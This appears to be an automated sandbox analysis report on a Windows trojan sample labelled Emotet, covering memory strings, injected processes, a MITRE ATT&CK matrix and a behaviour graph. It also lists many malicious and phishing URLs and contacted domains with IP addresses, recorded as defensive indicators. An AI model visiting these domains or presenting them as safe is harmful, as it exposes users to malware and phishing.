    Source: tGYLgZxMWmmBTD.exe, 00000009.00000002.1857835167.00000000027C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000009.00000002.1859321562.0000000002BD0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000009.00000002.1859321562.0000000002BD0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000000D.00000002.1864825235.0000000000D70000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000000D.00000002.1864825235.0000000000D70000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000000D.00000002.1866051279.0000000000DD0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000000D.00000002.1866051279.0000000000DD0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000011.00000002.1804322257.0000000000E10000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000011.00000002.1804322257.0000000000E10000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000011.00000002.1805040996.0000000000E70000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000011.00000002.1805040996.0000000000E70000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000014.00000002.1811513588.0000000002560000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000014.00000002.1811513588.0000000002560000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000014.00000002.1809736468.0000000002170000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000014.00000002.1809736468.0000000002170000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000016.00000002.1814429100.0000000001220000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000016.00000002.1814429100.0000000001220000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000016.00000002.1814626114.0000000001280000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000016.00000002.1814626114.0000000001280000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000018.00000002.1872752662.0000000000A30000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000018.00000002.1872752662.0000000000A30000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000018.00000002.1872402689.00000000009D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000018.00000002.1872402689.00000000009D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000001A.00000002.1838904239.00000000012E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000001A.00000002.1838904239.00000000012E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000001A.00000002.1839056548.0000000001340000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000001A.00000002.1839056548.0000000001340000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000001D.00000002.1881382385.0000000000A40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000001D.00000002.1881382385.0000000000A40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000001D.00000002.1882257401.0000000000AA0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000001D.00000002.1882257401.0000000000AA0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000001F.00000002.1890678971.00000000029B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000001F.00000002.1890678971.00000000029B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000001F.00000002.1891163811.0000000002D60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 0000001F.00000002.1891163811.0000000002D60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000022.00000002.1919595262.0000000002740000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000022.00000002.1919595262.0000000002740000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000022.00000002.1920132875.0000000002A20000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000022.00000002.1920132875.0000000002A20000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000027.00000002.1908352092.00000000028F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000027.00000002.1908352092.00000000028F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000027.00000002.1907577996.0000000000CB0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000027.00000002.1907577996.0000000000CB0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,2_2_02BC9E40
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE1250 htons,socket,setsockopt,closesocket,bind,listen,2_2_02BE1250
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE0480 setsockopt,htons,socket,setsockopt,bind,2_2_02BE0480
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_00901250 htons,socket,setsockopt,closesocket,bind,listen,5_2_00901250
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_00900480 setsockopt,htons,socket,setsockopt,bind,5_2_00900480
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008E9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,5_2_008E9E40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008B1250 htons,socket,setsockopt,closesocket,bind,listen,6_2_008B1250
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008B0480 setsockopt,htons,socket,setsockopt,bind,6_2_008B0480
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00899E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,6_2_00899E40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C01250 htons,socket,setsockopt,closesocket,bind,listen,9_2_02C01250
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BE9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,9_2_02BE9E40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C00480 setsockopt,htons,socket,setsockopt,bind,9_2_02C00480

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Valid Accounts    		22
    Native API    		1
    DLL Side-Loading    		1
    Abuse Elevation Control Mechanism    		1
    Disable or Modify Tools    		111
    Input Capture    		2
    System Time Discovery    		1
    Remote Desktop Protocol    		1
    Archive Collected Data    		4
    Ingress Tool Transfer    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter    		1
    Create Account    		1
    DLL Side-Loading    		1
    Abuse Elevation Control Mechanism    		LSASS Memory11
    Account Discovery    		Remote Desktop Protocol1
    Screen Capture    		11
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Scheduled Task/Job    		1
    Valid Accounts    		1
    Valid Accounts    		1
    Obfuscated Files or Information    		Security Account Manager1
    System Network Connections Discovery    		SMB/Windows Admin Shares111
    Input Capture    		11
    Non-Standard Port    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCron1
    Scheduled Task/Job    		11
    Access Token Manipulation    		31
    Software Packing    		NTDS2
    File and Directory Discovery    		Distributed Component Object Model2
    Clipboard Data    		1
    Remote Access Software    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchd1
    Registry Run Keys / Startup Folder    		613
    Process Injection    		1
    DLL Side-Loading    		LSA Secrets143
    System Information Discovery    		SSHKeylogging3
    Non-Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
    Bootkit    		1
    Scheduled Task/Job    		322
    Masquerading    		Cached Domain Credentials1
    Query Registry    		VNCGUI Input Capture14
    Application Layer Protocol    		Data Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
    Registry Run Keys / Startup Folder    		1
    Valid Accounts    		DCSync351
    Security Software Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
    Virtualization/Sandbox Evasion    		Proc Filesystem151
    Virtualization/Sandbox Evasion    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
    Access Token Manipulation    		/etc/passwd and /etc/shadow13
    Process Discovery    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron613
    Process Injection    		Network Sniffing11
    Application Window Discovery    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
    Bootkit    		Input Capture1
    System Owner/User Discovery    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553832 Sample: arxtPs1STE.exe Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 38 vowyzuf.com 2->38 40 vowymom.com 2->40 42 1009 other IPs or domains 2->42 56 Suricata IDS alerts for network traffic 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 18 other signatures 2->62 9 arxtPs1STE.exe 2 3 2->9         started        signatures3 process4 file5 34 C:\Windows\apppatch\svchost.exe, PE32 9->34 dropped 36 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 9->36 dropped 64 Detected unpacking (changes PE section rights) 9->64 66 Detected unpacking (overwrites its own PE header) 9->66 68 Moves itself to temp directory 9->68 70 8 other signatures 9->70 13 svchost.exe 2 109 9->13         started        signatures6 process7 dnsIp8 44 lyvytud.com 13->44 46 gatyvyz.com 13->46 48 24 other IPs or domains 13->48 72 System process connects to network (likely due to code injection or exploit) 13->72 74 Detected unpacking (changes PE section rights) 13->74 76 Detected unpacking (overwrites its own PE header) 13->76 78 15 other signatures 13->78 17 tGYLgZxMWmmBTD.exe 13->17 injected 20 tGYLgZxMWmmBTD.exe 13->20 injected 22 tGYLgZxMWmmBTD.exe 13->22 injected 24 10 other processes 13->24 signatures9 process10 signatures11 50 Monitors registry run keys for changes 17->50 52 Contains VNC / remote desktop functionality (version string found) 17->52 54 Found direct / indirect Syscall (likely to bypass EDR) 17->54 26 WerFault.exe 21 24->26         started        28 WerFault.exe 24->28         started        30 WerFault.exe 24->30         started        32 4 other processes 24->32 process12

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    arxtPs1STE.exe84%ReversingLabsWin32.Trojan.Emotet
    arxtPs1STE.exe100%AviraTR/Crypt.XPACK.Gen
    arxtPs1STE.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://purymuq.com/login.php100%Avira URL Cloudmalware
    http://purycap.com/login.php100%Avira URL Cloudmalware
    http://qegyryq.com/login.php100%Avira URL Cloudmalware
    http://vonymuf.com/login.phpcom/login.php100%Avira URL Cloudmalware
    http://puzylyp.com/login.php100%Avira URL Cloudmalware
    http://qedytul.com/100%Avira URL Cloudmalware
    http://galyryz.com/login.php100%Avira URL Cloudmalware
    http://gatyviw.com/login.php100%Avira URL Cloudmalware
    http://vopycoc.com/login.php100%Avira URL Cloudmalware
    http://vopycom.com/login.php100%Avira URL Cloudmalware
    http://ganyzub.com/login.php100%Avira URL Cloudphishing
    http://lyrywoj.com/login.php100%Avira URL Cloudmalware
    http://vojyjyc.com/login.php100%Avira URL Cloudphishing
    http://vowydef.com/login.php100%Avira URL Cloudmalware
    http://lysyvax.com/login.php100%Avira URL Cloudmalware
    http://qeqyxov.com/login.php100%Avira URL Cloudmalware
    http://pumyjig.com/login.php100%Avira URL Cloudmalware
    http://puvywav.com/100%Avira URL Cloudmalware
    http://lygyxun.com/login.php100%Avira URL Cloudmalware
    http://puzytul.com/login.php100%Avira URL Cloudmalware
    http://vocygim.com/100%Avira URL Cloudmalware
    http://vofydac.com/login.php100%Avira URL Cloudmalware
    http://lygysij.com/login.php100%Avira URL Cloudmalware
    http://qekyhil.com/login.php100%Avira URL Cloudmalware
    http://gadykos.com/login.php100%Avira URL Cloudmalware
    http://vocyruk.com/login.php100%Avira URL Cloudphishing
    http://lymyner.com/login.php100%Avira URL Cloudmalware
    http://gahyvab.com/login.php100%Avira URL Cloudmalware
    http://pupyguq.com/login.php100%Avira URL Cloudmalware
    http://lyrymuj.com/100%Avira URL Cloudmalware
    http://lygysij.com/100%Avira URL Cloudmalware
    http://qedyhyl.com/login.php100%Avira URL Cloudmalware
    http://pujycil.com/login.php100%Avira URL Cloudmalware
    http://pujyteq.com/login.php100%Avira URL Cloudmalware
    http://qexynyp.com/100%Avira URL Cloudmalware
    http://qegylep.com/pX100%Avira URL Cloudmalware
    http://vowykaf.com/login.php0%Avira URL Cloudsafe
    http://qetynev.com/login.php0%Avira URL Cloudsafe
    http://qetyvil.com/login.php100%Avira URL Cloudmalware
    http://qedyfyq.com/login.php100%Avira URL Cloudmalware
    http://gadyniw.com/login.php100%Avira URL Cloudmalware
    http://qetyxiq.com/100%Avira URL Cloudmalware
    http://volykyc.com/http://qeqysag.com/http://ganypih.com/http://lymysan.com/http://lymysan.com/http:100%Avira URL Cloudmalware
    http://gahykih.com/login.phpcom/login.php0%Avira URL Cloudsafe
    http://lyxygur.com/login.php100%Avira URL Cloudmalware
    http://gaqyres.com/login.php100%Avira URL Cloudmalware
    http://gadyhoh.com/login.php100%Avira URL Cloudmalware
    http://vonyryc.com/login.phpg100%Avira URL Cloudmalware
    http://pujyjav.com/http://qebytiq.com/http://vopybyt.com/http://gatyvyz.com/http://lyvytuj.com/http:100%Avira URL Cloudphishing
    https://puzylyp.com/login.php100%Avira URL Cloudmalware
    http://vojyjof.com/http://gahyhob.com/H100%Avira URL Cloudmalware
    http://vopybyt.com/100%Avira URL Cloudmalware
    http://qeqyxyp.com/login.php100%Avira URL Cloudmalware
    http://gahynuw.com/login.php100%Avira URL Cloudmalware
    http://pumyjip.com/login.php100%Avira URL Cloudmalware
    http://lygyjuj.com/login.php100%Avira URL Cloudmalware
    http://lyvytud.com/100%Avira URL Cloudphishing
    http://lyxyxox.com/login.php100%Avira URL Cloudmalware
    http://qedykiv.com/login.php100%Avira URL Cloudmalware
    http://vocypok.com/login.php100%Avira URL Cloudmalware
    http://qetyveq.com/login.php100%Avira URL Cloudmalware
    http://ww25.lyxynyx.com/login.php?subid1=20241112-0433-4491-9018-901015a08e06100%Avira URL Cloudmalware
    http://puvydov.com/login.php100%Avira URL Cloudmalware
    http://gahyqub.com/login.php100%Avira URL Cloudmalware
    http://qekyqop.com/login.php100%Avira URL Cloudmalware
    http://lysyfyj.com/login.php100%Avira URL Cloudmalware
    http://volyquk.com/login.php100%Avira URL Cloudmalware
    http://puzyxip.com/login.php100%Avira URL Cloudmalware
    http://qegyhig.com/login.phpr100%Avira URL Cloudmalware
    http://qegyhig.com/login.phpc100%Avira URL Cloudmalware
    http://lyryvex.com/login.phpg100%Avira URL Cloudmalware
    http://lyxywen.com/100%Avira URL Cloudmalware
    http://gacynuz.com/login.php100%Avira URL Cloudmalware
    http://galyqaz.com/login.php100%Avira URL Cloudmalware
    http://lymysan.com/login.php100%Avira URL Cloudphishing
    http://gacyzuz.com/login.php100%Avira URL Cloudphishing
    http://gahyhys.com/login.php100%Avira URL Cloudmalware
    http://gahyzez.com/login.php100%Avira URL Cloudmalware
    http://pupybul.com/H100%Avira URL Cloudmalware
    http://galyvas.com/login.php0%Avira URL Cloudsafe
    http://volyzic.com/login.php100%Avira URL Cloudmalware
    http://lykyjad.com/login.php100%Avira URL Cloudmalware
    http://gatyfus.com/login.php100%Avira URL Cloudmalware
    http://qebyrev.com/login.phpr100%Avira URL Cloudmalware
    http://volydot.com/login.php100%Avira URL Cloudphishing
    http://vojycec.com/100%Avira URL Cloudmalware
    http://ganyfes.com/login.php100%Avira URL Cloudmalware
    http://pujygug.com/login.php100%Avira URL Cloudmalware
    http://vocydyc.com/login.php100%Avira URL Cloudmalware
    http://lykyvod.com/login.php100%Avira URL Cloudmalware
    http://lyxywer.com/login.php100%Avira URL Cloudmalware
    http://lykymij.com/login.php100%Avira URL Cloudmalware
    http://lysyvan.com/login.php100%Avira URL Cloudmalware
    http://lykyfen.com/login.php100%Avira URL Cloudmalware
    http://lykywid.com/login.php100%Avira URL Cloudmalware
    http://qexylup.com/login.php100%Avira URL Cloudmalware
    http://lyvyxyj.com/login.php100%Avira URL Cloudmalware
    http://pumydyg.com/login.php100%Avira URL Cloudmalware
    http://lymyjon.com/login.php100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    pupydeq.com
    		13.248.169.48
    		truefalse
      		high
      pupycag.com
      		18.208.156.248
      		truefalse
        		high
        lyvyxor.com
        		208.100.26.245
        		truefalse
          		high
          77026.bodis.com
          		199.59.243.227
          		truefalse
            		high
            lysyvan.com
            		188.114.96.3
            		truefalse
              		high
              galynuh.com
              		64.225.91.73
              		truefalse
                		high
                parkingpage.namecheap.com
                		91.195.240.19
                		truefalse
                  		high
                  qegyhig.com
                  		188.114.96.3
                  		truefalse
                    		high
                    gatyfus.com
                    		178.162.217.107
                    		truefalse
                      		high
                      vonypom.com
                      		18.208.156.248
                      		truefalse
                        		high
                        puzylyp.com
                        		75.2.71.199
                        		truefalse
                          		high
                          qexyhuv.com
                          		76.223.67.189
                          		truefalse
                            		high
                            77980.bodis.com
                            		199.59.243.227
                            		truefalse
                              		high
                              pltraffic7.com
                              		72.52.179.174
                              		truefalse
                                		high
                                gadyciz.com
                                		44.221.84.105
                                		truefalse
                                  		high
                                  gadyniw.com
                                  		154.212.231.82
                                  		truefalse
                                    		high
                                    lyxynyx.com
                                    		103.224.212.210
                                    		truefalse
                                      		high
                                      www.sedoparking.com
                                      		64.190.63.136
                                      		truefalse
                                        		high
                                        lygyvuj.com
                                        		52.34.198.229
                                        		truefalse
                                          		high
                                          lygynud.com
                                          		3.94.10.34
                                          		truefalse
                                            		high
                                            gahyqah.com
                                            		162.255.119.102
                                            		truefalse
                                              		high
                                              vocyzit.com
                                              		44.221.84.105
                                              		truefalse
                                                		high
                                                galyqaz.com
                                                		199.191.50.83
                                                		truefalse
                                                  		high
                                                  vofycot.com
                                                  		103.224.182.252
                                                  		truefalse
                                                    		high
                                                    qetyhyg.com
                                                    		64.225.91.73
                                                    		truefalse
                                                      		high
                                                      bg.microsoft.map.fastly.net
                                                      		199.232.214.172
                                                      		truefalse
                                                        		high
                                                        gahyhiz.com
                                                        		44.221.84.105
                                                        		truefalse
                                                          		high
                                                          qetyfuv.com
                                                          		44.221.84.105
                                                          		truefalse
                                                            		high
                                                            gtm-sg-6l13ukk0m05.qu200.com
                                                            		103.150.10.48
                                                            		truetrue
                                                              		unknown
                                                              lymyxid.com
                                                              		3.94.10.34
                                                              		truefalse
                                                                		high
                                                                qegyval.com
                                                                		154.85.183.50
                                                                		truefalse
                                                                  		high
                                                                  gatyzoz.com
                                                                  		unknown
                                                                  		unknowntrue
                                                                    		unknown
                                                                    lykygaj.com
                                                                    		unknown
                                                                    		unknowntrue
                                                                      		unknown
                                                                      qedyxel.com
                                                                      		unknown
                                                                      		unknowntrue
                                                                        		unknown
                                                                        qedyqup.com
                                                                        		unknown
                                                                        		unknowntrue
                                                                          		unknown
                                                                          qekyluv.com
                                                                          		unknown
                                                                          		unknowntrue
                                                                            		unknown
                                                                            gatyrez.com
                                                                            		unknown
                                                                            		unknowntrue
                                                                              		unknown
                                                                              vofybic.com
                                                                              		unknown
                                                                              		unknowntrue
                                                                                		unknown
                                                                                pujydag.com
                                                                                		unknown
                                                                                		unknowntrue
                                                                                  		unknown
                                                                                  vojykom.com
                                                                                  		unknown
                                                                                  		unknowntrue
                                                                                    		unknown
                                                                                    qetysuq.com
                                                                                    		unknown
                                                                                    		unknowntrue
                                                                                      		unknown
                                                                                      vonyzut.com
                                                                                      		unknown
                                                                                      		unknowntrue
                                                                                        		unknown
                                                                                        pufyjuq.com
                                                                                        		unknown
                                                                                        		unknowntrue
                                                                                          		unknown
                                                                                          pujytug.com
                                                                                          		unknown
                                                                                          		unknowntrue
                                                                                            		unknown
                                                                                            galyhiw.com
                                                                                            		unknown
                                                                                            		unknowntrue
                                                                                              		unknown
                                                                                              lykygun.com
                                                                                              		unknown
                                                                                              		unknowntrue
                                                                                                		unknown
                                                                                                vopymyc.com
                                                                                                		unknown
                                                                                                		unknowntrue
                                                                                                  		unknown
                                                                                                  gatyfaz.com
                                                                                                  		unknown
                                                                                                  		unknowntrue
                                                                                                    		unknown
                                                                                                    vojycit.com
                                                                                                    		unknown
                                                                                                    		unknowntrue
                                                                                                      		unknown
                                                                                                      lyvymej.com
                                                                                                      		unknown
                                                                                                      		unknowntrue
                                                                                                        		unknown
                                                                                                        lygyvar.com
                                                                                                        		unknown
                                                                                                        		unknowntrue
                                                                                                          		unknown
                                                                                                          purygiv.com
                                                                                                          		unknown
                                                                                                          		unknowntrue
                                                                                                            		unknown
                                                                                                            gahykeb.com
                                                                                                            		unknown
                                                                                                            		unknowntrue
                                                                                                              		unknown
                                                                                                              purymog.com
                                                                                                              		unknown
                                                                                                              		unknowntrue
                                                                                                                		unknown
                                                                                                                gadyzib.com
                                                                                                                		unknown
                                                                                                                		unknowntrue
                                                                                                                  		unknown
                                                                                                                  ganyqow.com
                                                                                                                  		unknown
                                                                                                                  		unknowntrue
                                                                                                                    		unknown
                                                                                                                    lyxysun.com
                                                                                                                    		unknown
                                                                                                                    		unknowntrue
                                                                                                                      		unknown
                                                                                                                      puzyjyg.com
                                                                                                                      		unknown
                                                                                                                      		unknowntrue
                                                                                                                        		unknown
                                                                                                                        vopydek.com
                                                                                                                        		unknown
                                                                                                                        		unknowntrue
                                                                                                                          		unknown
                                                                                                                          qexyfuq.com
                                                                                                                          		unknown
                                                                                                                          		unknowntrue
                                                                                                                            		unknown
                                                                                                                            gatykyh.com
                                                                                                                            		unknown
                                                                                                                            		unknowntrue
                                                                                                                              		unknown
                                                                                                                              vocykem.com
                                                                                                                              		unknown
                                                                                                                              		unknowntrue
                                                                                                                                		unknown
                                                                                                                                gahynus.com
                                                                                                                                		unknown
                                                                                                                                		unknowntrue
                                                                                                                                  		unknown
                                                                                                                                  pumypop.com
                                                                                                                                  		unknown
                                                                                                                                  		unknowntrue
                                                                                                                                    		unknown
                                                                                                                                    lyvysur.com
                                                                                                                                    		unknown
                                                                                                                                    		unknowntrue
                                                                                                                                      		unknown
                                                                                                                                      galypob.com
                                                                                                                                      		unknown
                                                                                                                                      		unknowntrue
                                                                                                                                        		unknown
                                                                                                                                        puzypav.com
                                                                                                                                        		unknown
                                                                                                                                        		unknowntrue
                                                                                                                                          		unknown
                                                                                                                                          gacyqoz.com
                                                                                                                                          		unknown
                                                                                                                                          		unknowntrue
                                                                                                                                            		unknown
                                                                                                                                            lykywid.com
                                                                                                                                            		unknown
                                                                                                                                            		unknowntrue
                                                                                                                                              		unknown
                                                                                                                                              lykytin.com
                                                                                                                                              		unknown
                                                                                                                                              		unknowntrue
                                                                                                                                                		unknown
                                                                                                                                                vofyref.com
                                                                                                                                                		unknown
                                                                                                                                                		unknowntrue
                                                                                                                                                  		unknown
                                                                                                                                                  qekytig.com
                                                                                                                                                  		unknown
                                                                                                                                                  		unknowntrue
                                                                                                                                                    		unknown
                                                                                                                                                    vocyzek.com
                                                                                                                                                    		unknown
                                                                                                                                                    		unknowntrue
                                                                                                                                                      		unknown
                                                                                                                                                      puvypoq.com
                                                                                                                                                      		unknown
                                                                                                                                                      		unknowntrue
                                                                                                                                                        		unknown
                                                                                                                                                        puvybeg.com
                                                                                                                                                        		unknown
                                                                                                                                                        		unknowntrue
                                                                                                                                                          		unknown
                                                                                                                                                          pupydig.com
                                                                                                                                                          		unknown
                                                                                                                                                          		unknowntrue
